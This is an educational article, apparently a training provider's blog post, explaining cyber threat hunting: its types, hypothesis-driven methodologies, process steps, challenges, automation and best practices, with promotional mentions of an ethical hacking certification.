Cyber Threat Hunting: Types, Methodologies, Best Practices

Cyber threat can be defined as a potential attack, destruction or damage of a cyber system that is launched over a network. Cyber threat hunting is the practice of looking for cyber threats that are present undetected in a network. Threat hunting is known to spot malicious actors that slip past the security defenses. With the constantly growing cases of cyber attacks, it has become critical to hunt and protect the systems against these. We recommend that you earn the top Ethical Hacking certification and stay ahead of the mass. 

What is Cyber Threat Hunting?

Cyber threat hunting is the process of proactively looking for security threats that are hiding unnoticed in an organization's network system. It is usually performed after the cyber threat detection phase, where an automated solution is deployed to look for known threats. Threat detection is a passive approach to constantly monitor network endpoints to identify anomalies, whereas threat hunting is an active approach to look for cyber risks/threats that were not identified earlier.  

Cyber threat hunting does not wait for an IoC (Indicator of Compromise) alert to trigger; instead, it creates a hypothesis-based approach backed by threat data to hunt down any lurking threats and generate IOCs in some cases.  

Need Threat Hunting Along with Threat Detection

Modern attacks are becoming more sophisticated day by day and that means in some cases, it can get through unnoticed by different automated threat-hunting solutions and sit unnoticed for days, weeks & months for eg. Advanced persistent threats (APTs). These threats can then gather sensitive data such as confidential information, Internal IPs, and secure login credentials which can be later used to get control over the system. 

On average, it is estimated that automated security threat detection solutions, SOC tier 1 & 2 are able to detect 80% of the threats, but the remaining 20% needs due diligence and proactive strategy to identify them at the earliest.

Key Elements of Threat Hunting

Some of the important elements in a threat hunting practice is identifying anomalies, then using tools and techniques, analyzing anomalies as a threat, and in the end finding ways to remediate those threats before the attacker exploits them. In the below section, let’s try to understand how threat hunting works. Before starting with how cyber threat hunting works, it is a good time to understand APTs (Advanced persistent threats) in brief. 

What is an APT? 

An advanced persistent threat refers to an attack in which an attacker intends to establish an illicit, long-term presence on a network in order to gather highly sensitive data. Executing an APT generally involves more complex vectors than a standard web application attack. The targets of these assaults, which are very carefully chosen and researched, typically include large enterprises or governmental networks. Some of the common motives for launching such intrusions are vast and can include: 

1. IP, Intellectual property theft (e.g., trade secrets or patents).
2. Exfiltrating sensitive information (e.g., employee and user private data).
3. Launching DoS attacks to sabotage critical organizational infrastructures like databases.

How does Cyber Threat Hunting Work?

One key point to be noticed is that Cyber Threat Hunting is a data-driven activity. It depends on the availability of data generated out of endpoint monitoring tools. Threat hunting goes beyond a regular SIEM (Security information and event management) and EDR (endpoint detection and response) methodology and adds a human intelligence layer. Threat hunters go through these event logs/data to identify any new security attack patterns based on their drafted hunting models. 

Types of Threat Hunting

1. Structured

Security hunting is performed based on an indicator of attack (IoA), as well as the tactics, techniques, and procedures (TTPs) used by attackers.  

2. Unstructured

Here threat hunting is performed based on a trigger/indicator of compromise (IoC), threat hunters use unstructured hunting to search for any anomalies or patterns throughout the system. 

3. Situational

Here, situational hypotheses are designed from circumstances, such as vulnerabilities discovered during a network risk assessment. Entity-oriented leads are used from crowd-sourced attack data which consists of latest TTPs of current cyber security threats. A threat hunter can then search for these specific behaviors within the test system.

Threat Hunting Methodologies

Baseline is critical before starting creating the investigation models for threat hunting. Baseline refers to establishing a clear difference between a malicious and a non-malicious event to identify anomalies. Let’s discuss some common threat hunting methodologies that are commonly used: 

1. Hypothesis-driven Investigation

This is the most common hunting model where hunters use a threat/ attack library which has updated IoA (Indicator of attack) and latest TTPs (tactics, techniques and procedure) from a large pool of crowdsourced attack data. These hunting libraries are aligned with global detection runbooks like MITRE ATT&CK framework. Using these IoAs and TTPs hunter tries to proactively look for new threats in the system.

2. Investigation Based on Known Indicators of Compromise or Indicators of Attack (IoA)

Intel based hunting model is a reactive approach where it uses the latest IoC (Indicator of Compromise) from different threat intelligence sources. It is performed once the SIEM has an alert based on IoC in the system.

3. Situational or Advanced Analytics and Machine Learning Investigations

In this method, hypotheses are derived from situational circumstances, such as in the case of geo-political issues or targeted attacks. This investigation can combine both hypothesis-driven and intel-driven models to use IoAs and IoCs.

Steps to Cyber Threat Hunting

The process of proactive cyber hunt for threat generally involves these steps: 

1. Developing Hypothesis

Cyber hunt typically begins with developing a threat hypothesis based on previously known threats, vulnerabilities or from third party threat intelligence sources including the latest attacker's TTP (tactics, techniques and procedure). This hypothesis development is crucial to identify patterns and anomalies that can lead to potential threat detection.

2. Collect and Process Intelligence and Data

To process the data using derived hypotheses, it becomes equally important to collect data from various endpoints in the system. Data is then processed to see if it has anomalies and can invoke a trigger.

3. Identifying Triggers

A trigger refers to a specific case where need for further investigation is required for eg. when threat detection tools identify unusual actions that may indicate malicious activity. Often, a hypothesis about a new attack or threat can be the trigger for proactive cyber threat hunting.

4. Investigation

Once a trigger has been identified, the next step is to analyse the anomaly condition which can then be converted into a IoC (Indicator of Compromise) or a IoA (Indicator of Attack). In this phase the threat hunter used security datasets from different tool sources like EDR (Endpoint detection and Response), SIEM (Security information and event management) to identify any lurking malicious threat in the system.

5. Resolution

This is the final and most critical phase after identification of a political Indicator of Attack (IoA) or Indicator of Compromise (IoC). Here the threat hunter communicates the security threat with all other stakeholders like operations team to deploy an apt incident response solution at the earliest.

In many cases, security teams already have automated incident response solutions deployed which include a pre-configured list of steps to handle specific security conditions. Resolution phase is very much dependent on the level of details about the attack and attacker that the threat hunter was able to guess.

What’s Required to Start Threat Hunting?

1. Human Hunters (Cyber Security Experts)

An effective cyber threat hunting program needs seasoned cyber security personnel on security hunting. Human effort helps get to a complex resolution much quicker and with better accuracy. Generally, a cyber security expert with proper cyber security knowledge and certification can be considered a good fit for this role.  

2. Organizational Model

Every organization must design their own best suited threat hunting model for its threat hunting process. Models should be based on an organization's unique threat hunting use cases. 

3. Tools & Technology

Many organizations use endpoint security solutions for detection to response and investigations, security monitoring, and management tools often used by their threat hunters for further analysis. For example, SIEM services. 

4. Data 

Data is the most key part for establishing a baseline of a system behavior. It can also be used to develop a baseline of expected and authorized events which can be late used to identify anomalies. 

Top Challenges of Cyber Security Hunting

So far we have seen what cyber threat hunting is and how it works. It is worth noting that since threat hunting is a proactive activity, it comes with its own set of challenges. Let us see some of the common challenges an organization gets when implementing such security activities:

1. Deploying Seasoned Cyber Threat Hunters

The human capital involved with cyber threat hunting is arguably the most difficult part. It is a constant challenge for any organisation to find and keep skilled cyber threat hunters.

2. Data Generation and Management

To efficiently identify hidden cyber threats, it is most critical to gather security data (both current and historical data) that provides visibility across an entire system. Such kind of data collection always involves dependencies on commercial third party tools and the same is needed to generate useful data points for threat hunting.

3. Staying up-to-date With Threat Intelligence

Threat hunters must be equipped with the most up-to-date attacker's TTP (tactics, techniques and procedure), threat intelligence, enabling them to analyze current cyber attack trends with organization security data. This is very important in generating an effective threat hunting hypothesis model.

Need for Automation in Threat Hunting

One can easily get overwhelmed by the above description of cyber threat hunting and its working. Cyber Threat hunting does add human intelligence to our existing threat identification techniques, but there are many scopes to automate certain activities. Let's talk about a few areas where automation can help make cyber hunting more efficient and sustainable.

1. Data Collection

Cyber threat hunting investigations involve collecting many categories and data from a variety of endpoint sources. If done manually, it can take numerous hours to maintain, sort and parse these data into a normalized usable format. Here, deploying automated solutions or utilities can greatly reduce the amount of time required for collection, sorting and maintenance.

2. Investigation Process

A constant high volume of cyber threat alerts can easily overwhelm even the most experienced and well-staffed SOC. Automation can help reduce unwanted false positives or noise by quickly categorizing which threats are high, medium, and low risk, thus helping security teams in prioritizing their effort and allowing them to efficiently address remediation.

3. Response Process

As discussed above, there are many commercial Incident response solutions/ tools which can be configured with pre-defined remediation steps. Automated responses can counter the smaller, more routine attacks, such as deleting custom scripts to isolate a compromised endpoint, deleting malicious files after isolation, and automatically using backup info to restore data compromised in an attack.

Tips and Best Practices to Improve Threat Hunting

1. Identify your Organization’s “normal”

This means we should baseline first what is a normal expected behaviour of our organization systems and then work on identifying for anomalies.

2. Observe, Orient, Decide, Act (OODA)

This can be seen a work-flow for a successful threat hunting practice. First observed for anomalies, then structure the identified risks, then decide the required actions to mend those anomalies and finally execute your actions. 

3. Have Appropriate and Sufficient Resources

To carry out all the above actions effectively and efficiently, we need to have access to required resources like trained human professionals and analytical software tools. There is a plethora of Cyber Security certification courses online that one can refer to keep their resources job ready.

Conclusion

In the above sections, we saw what Cyber threat hunting is, its importance and how it is implemented. We saw how cyber threat hunting is an active approach whereas threat detection is a passive one. Threat hunting involves adding human intelligence to create threat hypotheses for the identification of malicious activities and threats. Data plays a key role in all the steps of threat hunting from baselining, hypothesis creation, and investigation to remediation. KnowledgeHut top Ethical Hackingcertification will aid you in getting a job in the top companies.